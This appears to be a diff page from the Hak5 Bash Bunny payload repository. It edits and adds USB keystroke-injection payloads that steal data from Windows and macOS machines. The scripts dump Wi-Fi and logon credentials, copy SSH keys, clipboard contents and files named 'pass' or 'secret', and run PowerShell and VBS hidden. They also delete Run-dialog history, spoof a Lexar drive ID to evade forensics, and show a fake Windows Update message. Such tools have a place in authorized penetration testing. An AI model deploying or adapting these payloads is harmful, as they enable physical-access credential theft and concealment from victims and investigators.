||||
__Installation__
|
||||
|
||||
See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
|
||||
|
||||
## STATUS
|
||||
|
||||
| Attack Stage | Description |
|
||||
| ------------------- | ------------------------------|
|
||||
| Stage 1 | Powershell |
|
||||
| Stage 2 | Delivering powershell payload |
|
||||
| Stage 2 | Delivering powershell payload |
|
||||
|
||||
@@ -1,32 +1,32 @@
|
||||
# Title: BlackBackup
|
||||
# Author: JWHeuver & JBaselier
|
||||
# Version: 1.0
|
||||
#
|
||||
# Runs powershell script to get Wlan and logon credentials
|
||||
# from computer and save them on USB drive (Storage attack)
|
||||
#
|
||||
# Purple.............Loading
|
||||
# Green .............Execute Credential Ripper Powershell
|
||||
# Off................Finished
|
||||
#
|
||||
#!/bin/bash
|
||||
|
||||
# Title: BlackBackup
|
||||
# Author: JWHeuver & JBaselier
|
||||
# Version: 1.0
|
||||
# Description: Runs powershell script to get Wlan and logon credentials
|
||||
# from computer and save them on USB drive (Storage attack)
|
||||
#
|
||||
# LEDS:
|
||||
# Purple: Loading
|
||||
# Green: Execute Credential Ripper Powershell
|
||||
# Off: Finished
|
||||
#
|
||||
|
||||
# OPTIONS - More options available in the Powershell payload
|
||||
OBFUSCATECMD="N" # Y=yes or N=no
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable and switch_positions
|
||||
source bunny_helpers.sh
|
||||
|
||||
#-----------------------------------
|
||||
# Purple LED - initializing
|
||||
LED R B 0
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Attackmode HID / Storage
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#-----------------------------------
|
||||
# Green LED - executing credential_powershell
|
||||
LED G 0
|
||||
LED STAGE1
|
||||
|
||||
QUACK GUI r
|
||||
QUACK DELAY 300
|
||||
@@ -57,4 +57,4 @@ QUACK ENTER
|
||||
|
||||
#-----------------------------------
|
||||
# Kill the lights - finished
|
||||
LED 0
|
||||
LED FINISH
|
||||
|
||||
@@ -1,60 +1,43 @@
|
||||
#Title: FileInfoExfiltrator
|
||||
#Author: A_SarcasticGuy
|
||||
#Version: 1.0
|
||||
#Target: Windows
|
||||
#!/bin/bash
|
||||
|
||||
# Title: FileInfoExfiltrator
|
||||
# Author: A_SarcasticGuy
|
||||
# Version: 1.0
|
||||
# Attack Modes: HID, STORAGE
|
||||
# Targets: Windows
|
||||
# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided)
|
||||
# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*")
|
||||
# to then be outputted to a text file in the loot directory, in a subfolder with the name of the
|
||||
# system and with a file name of the date and time of the scan.
|
||||
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
||||
#
|
||||
#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
|
||||
# LEDS
|
||||
# Magenta: Script Started
|
||||
# Yellow: Ducky Script Started
|
||||
# Red: Failed to run Ducky Script, see log file
|
||||
#
|
||||
# Options: Search Directory: Find in p.bat (default c:/)
|
||||
# Search criteria: Find in p.bat (default "pass*")
|
||||
#
|
||||
# Purple LED..................Script Started
|
||||
# Yellow LED..................Ducky Script Started
|
||||
# Red LED.....................Failed to run Ducky Script, see log file
|
||||
#
|
||||
# NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
|
||||
#
|
||||
|
||||
LED B R
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
|
||||
|
||||
# Set language
|
||||
QUACK SET_LANGUAGE gb
|
||||
|
||||
|
||||
# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
|
||||
source bunny_helpers.sh
|
||||
|
||||
|
||||
|
||||
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
|
||||
|
||||
|
||||
#Call ducky script
|
||||
LED R G
|
||||
#Call ducky script
|
||||
LED STAGE1
|
||||
|
||||
|
||||
QUACK ${SWITCH_POSITION}/ducky_script.txt
|
||||
|
||||
|
||||
QUACK DELAY 10000
|
||||
|
||||
LED R G B
|
||||
LED FINISH
|
||||
|
||||
else
|
||||
|
||||
|
||||
LED R
|
||||
|
||||
|
||||
LED FAIL
|
||||
#Red LED if unable to load script
|
||||
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
|
||||
|
||||
|
||||
|
||||
exit 1
|
||||
|
||||
|
||||
fi
|
||||
|
||||
@@ -4,9 +4,9 @@
|
||||
# Author: k1ul3ss
|
||||
# Props: audibleblink
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: macOS
|
||||
# Attackmodes: HID, Storage
|
||||
# Targets: macOS
|
||||
# Attack Modes: HID, Storage
|
||||
# Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage.
|
||||
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||
|
||||
@@ -28,4 +28,4 @@ QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Ter
|
||||
QUACK ENTER
|
||||
|
||||
# sync the filesystem
|
||||
sync
|
||||
sync
|
||||
|
||||
@@ -3,19 +3,24 @@
|
||||
# Title: Powershell Extractor
|
||||
# Author: $irLurk$alot
|
||||
# Version: 1.0
|
||||
# Target: Windows
|
||||
#
|
||||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||
# which in turn runs powershell script to copy move and extract data.
|
||||
# Targets: Windows
|
||||
# Attack Modes: HID, STORAGE
|
||||
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||
# which in turn runs powershell script to copy move and extract data.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setting Up
|
||||
# Yellow Blink: Executing Powershell
|
||||
# Green: Finished
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||
source bunny_helpers.sh
|
||||
LED SETUP
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
LED R 100
|
||||
ATTACKMODE HID STORAGE
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED R B 100
|
||||
LED ATTACK
|
||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
||||
QUACK ENTER
|
||||
LED R G B
|
||||
LED FINISH
|
||||
|
||||
@@ -2,13 +2,14 @@
|
||||
#
|
||||
# Title: sMacAndGrab
|
||||
# Author: audibleblink
|
||||
# Target: macOS
|
||||
# Targets: macOS
|
||||
# Version: 1.2
|
||||
# Attack Modes: STORAGE, HID
|
||||
# Description: Backup a list of files from macOS
|
||||
#
|
||||
# Backup a list of files from macOS
|
||||
#
|
||||
# Yellow (blinking)...Attacking
|
||||
# Green...............Finished
|
||||
# LEDS:
|
||||
# Yellow Blink: Attacking
|
||||
# Green: Finished
|
||||
|
||||
LED ATTACK
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
|
||||
|
||||
4
payloads/library/exfiltration/SmartFileExtract/d.cmd
Normal file
4
payloads/library/exfiltration/SmartFileExtract/d.cmd
Normal file
@@ -0,0 +1,4 @@
|
||||
@echo off
|
||||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell"
|
||||
cscript %~dp0\i.vbs %~dp0\e.cmd
|
||||
@exit
|
||||
25
payloads/library/exfiltration/SmartFileExtract/e.cmd
Normal file
25
payloads/library/exfiltration/SmartFileExtract/e.cmd
Normal file
@@ -0,0 +1,25 @@
|
||||
REM Setup required:
|
||||
REM o Create SFE in the loot directory
|
||||
REM o Place SmartFileExtract on the root of the bashbunny
|
||||
@echo off
|
||||
@echo Installing Windows Update
|
||||
|
||||
REM Delete registry keys storing Run dialog history
|
||||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
|
||||
REM Creates directory compromised of computer name, date and time
|
||||
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
|
||||
set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
|
||||
mkdir %dst% >>nul
|
||||
|
||||
|
||||
if Exist %USERPROFILE%\Documents (
|
||||
%~dp0\..\..\SmartFileExtract /drive c /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul
|
||||
|
||||
)
|
||||
|
||||
REM Blink CAPSLOCK key
|
||||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
|
||||
|
||||
@cls
|
||||
@exit
|
||||
1
payloads/library/exfiltration/SmartFileExtract/i.vbs
Normal file
1
payloads/library/exfiltration/SmartFileExtract/i.vbs
Normal file
@@ -0,0 +1 @@
|
||||
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
|
||||
31
payloads/library/exfiltration/SmartFileExtract/payload.txt
Normal file
31
payloads/library/exfiltration/SmartFileExtract/payload.txt
Normal file
@@ -0,0 +1,31 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: SmartFileExtract
|
||||
# Author: IMcPwn
|
||||
# Props: SaintCrossbow
|
||||
# Version: 1.0
|
||||
# Targets: Windows
|
||||
# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||
# which in turn executes e.cmd invisibly using i.vbs
|
||||
# which in turn copies payload.exe from the root of the Bash Bunny and then executes it
|
||||
# using the --startup parameter. Change these settings inside of e.cmd.
|
||||
#
|
||||
# LEDS:
|
||||
# Red: Attacking
|
||||
# Green: Finished
|
||||
|
||||
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
|
||||
source bunny_helpers.sh
|
||||
|
||||
LED R
|
||||
# Note: Acting as Lexar Compact Flash Drive to throw off forensics
|
||||
ATTACKMODE HID STORAGE VID_0X05DC PID_0X0081
|
||||
QUACK DELAY 200
|
||||
REM --> Minimize all windows
|
||||
QUACK WINDOWS d
|
||||
QUACK DELAY 200
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch2\d.cmd')"
|
||||
QUACK ENTER
|
||||
LED G
|
||||
1
payloads/library/exfiltration/SmartFileExtract/readme.md
Normal file
1
payloads/library/exfiltration/SmartFileExtract/readme.md
Normal file
@@ -0,0 +1 @@
|
||||
# Exfiltrate using SmartFileExtract Utility
|
||||
26
payloads/library/exfiltration/SmartFileExtract/setup.txt
Normal file
26
payloads/library/exfiltration/SmartFileExtract/setup.txt
Normal file
@@ -0,0 +1,26 @@
|
||||
Method of calling SmartFileExtractor is based on the excellent work of IMcPwn: the ExecutableInstaller.
|
||||
See the BashBunny Wiki for the original version.
|
||||
|
||||
Setup:
|
||||
- Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract
|
||||
* Quick tip: you only need the SmartFileExtract.exe from the project root
|
||||
- Copy SmartFileExtract.exe to the root of the bashubunny
|
||||
- Change payload.txt:
|
||||
a) Your file volume name for the bashbunny (if necessary)
|
||||
b) What kind of device you want the bunny to spoof.
|
||||
Note: Very much recommend you do this, otherwise will be picked up by forensics
|
||||
- Change e.cmd:
|
||||
a) Change your options for Smart File Extract here.
|
||||
|
||||
The default payload included in this distribution:
|
||||
- Looks to Forensics like a Lexar drive (but still called BashBunny)
|
||||
- Finds all files with a) the word secret or pass in the filename as well as b) any doc files
|
||||
- Reports status as a fake install window
|
||||
- Stops extract after 90 seconds or 500 MBs
|
||||
|
||||
SmartFileExtract has full documentation on how to use the utility, but if you want to kick the tires and light the fires, run:
|
||||
smartfileextract /help
|
||||
|
||||
Good luck!
|
||||
|
||||
Saint Crossbow
|
||||
9
payloads/library/exfiltration/TwoStageMac/README.md
Normal file
9
payloads/library/exfiltration/TwoStageMac/README.md
Normal file
@@ -0,0 +1,9 @@
|
||||
# Two Stage Mac
|
||||
|
||||
Author: Draxiom
|
||||
|
||||
## Description
|
||||
A simple two stage payload for OSX. First stage, opens terminal and executes a shell script, saved on the Bash Bunny's storage. Sample second stage does some device profiling.
|
||||
|
||||
## Usage
|
||||
Overwrite second-stage.sh with custom script and plug into mac. It should open up terminal and execute the second stage via `sh /Volumes/BashBunny/switch#/second-stage.sh`. Loot is saved in /Volumes/BashBunny/loot/hostname/epoch/ and is passed into second-stage.sh as the parameter `$1`
|
||||
48
payloads/library/exfiltration/TwoStageMac/payload.txt
Normal file
48
payloads/library/exfiltration/TwoStageMac/payload.txt
Normal file
@@ -0,0 +1,48 @@
|
||||
# Title: TwoStageMac
|
||||
# Description: A simple two stage payload for OSX. Sample second stage
|
||||
# does some device profiling.
|
||||
#
|
||||
# Author: Draxiom
|
||||
# Props: jdetmold
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Target: OSX
|
||||
# Attack Modes: HID, STORAGE
|
||||
# LEDS:
|
||||
# Magenta - Setup
|
||||
# Yellow Blink - Attacking
|
||||
# White - Clean up
|
||||
# Green - Finished
|
||||
|
||||
LED SETUP
|
||||
ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Global variables
|
||||
MOUNTING_LOCATION=/Volumes/BashBunny
|
||||
SECOND_STAGE=${MOUNTING_LOCATION}/payloads/${SWITCH_POSITION}/second-stage.sh
|
||||
LOOT_DIR=${MOUNTING_LOCATION}/loot/$\(hostname\)
|
||||
|
||||
# Open terminal
|
||||
LED ATTACK
|
||||
RUN OSX terminal
|
||||
Q ENTER
|
||||
Q DELAY 200
|
||||
# Open new window in case there's already a terminal window open
|
||||
Q GUI n
|
||||
Q DELAY 100
|
||||
|
||||
# Set up loot directory and pipe output to text file (named by epoch time)
|
||||
Q STRING NOW=$\(date +'%s'\)\; mkdir -p $LOOT_DIR/\$NOW\; sh $SECOND_STAGE ${LOOT_DIR}/\$NOW \> $LOOT_DIR/\$NOW/STDOUT.txt 2\> $LOOT_DIR/\$NOW/STDERR.txt
|
||||
Q ENTER
|
||||
|
||||
# Eject
|
||||
LED CLEANUP
|
||||
Q STRING diskutil eject ${MOUNTING_LOCATION}
|
||||
Q ENTER
|
||||
Q STRING killall Terminal
|
||||
Q ENTER
|
||||
|
||||
sync
|
||||
|
||||
LED FINISH
|
||||
61
payloads/library/exfiltration/TwoStageMac/second-stage.sh
Normal file
61
payloads/library/exfiltration/TwoStageMac/second-stage.sh
Normal file
@@ -0,0 +1,61 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# This is a sample second-stage script. It will scrape some interesting
|
||||
# information from a mac. The target loot directory is passed in as $1
|
||||
# I have added echo statements for each command to make it easier to parse
|
||||
# STDOUT when viewing loot afterwards.
|
||||
|
||||
echo "$ whoami"
|
||||
whoami
|
||||
|
||||
echo "$ uname -a"
|
||||
uname -a
|
||||
|
||||
echo "$ df -h"
|
||||
df -h
|
||||
|
||||
echo "$ ls ~"
|
||||
ls -alF ~
|
||||
|
||||
echo "$ cd ${1}"
|
||||
cd $1
|
||||
|
||||
echo "$ cp -r ~/.ssh ssh"
|
||||
cp -r ~/.ssh $1/ssh
|
||||
|
||||
echo "$ cp -r ~/.bash* ."
|
||||
cp -r ~/.bash* $1/.
|
||||
|
||||
echo "for file in .*; do"
|
||||
for file in .*; do
|
||||
# Skip "." and ".." and unhide every hidden file
|
||||
if [[ "${file}" =~ ^\.*$ ]]; then
|
||||
echo "Skip \"${file}\""
|
||||
else
|
||||
echo "mv ${file} ${file#.}"
|
||||
mv "$file" "${file#.}"
|
||||
fi
|
||||
done
|
||||
echo "done"
|
||||
|
||||
# Lifted from library/recon/MacProfiler
|
||||
echo "$ history"
|
||||
history
|
||||
|
||||
echo "$ osascript -e \"the clipboard\" > clipboard.txt"
|
||||
osascript -e "the clipboard" > clipboard.txt
|
||||
|
||||
echo "$ dscl . list /Users | grep -v '_'"
|
||||
dscl . list /Users | grep -v '_'
|
||||
|
||||
echo "$ ifconfig"
|
||||
ifconfig
|
||||
|
||||
echo "$ curl ipecho.net/plain"
|
||||
curl ipecho.net/plain
|
||||
|
||||
echo "$ osascript -e 'tell application \"System Events\" to get the name of every login item'"
|
||||
osascript -e 'tell application "System Events" to get the name of every login item'
|
||||
|
||||
echo "$ ls /Applications/"
|
||||
ls /Applications/
|
||||
@@ -2,16 +2,17 @@
|
||||
#
|
||||
# Title: BrowserData
|
||||
# Author: zachstanford
|
||||
# Version: 0.1 (Tested on Windows 10)
|
||||
# Version: 0.1
|
||||
# Targets: Windows
|
||||
# Attack Modes: HID, STORAGE
|
||||
# Description: Dumps browser info like history and bookmarks from powershell script
|
||||
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
|
||||
# Credits to this Empire's powershell script:
|
||||
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
|
||||
#
|
||||
# Dumps browser info like history and bookmarks from powershell script
|
||||
# then saves them in /root/udisk/loot/BrowserData/%ComputerName%
|
||||
# Credits to this Empire's powershell script:
|
||||
# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1
|
||||
|
||||
#script
|
||||
# Blue...............Running Script
|
||||
# Purple.............Finished
|
||||
# LEDS:
|
||||
# Blue: Running Script
|
||||
# Magenta: Finished
|
||||
|
||||
# Not sure if this is the right variable. Feel free to change it.
|
||||
|
||||
@@ -23,7 +24,6 @@ LED R SLOW
|
||||
LOOTDIR=/root/udisk/loot/BrowserData
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
|
||||
LED B SLOW
|
||||
|
||||
# wait 6 seconds for the storage to popup
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user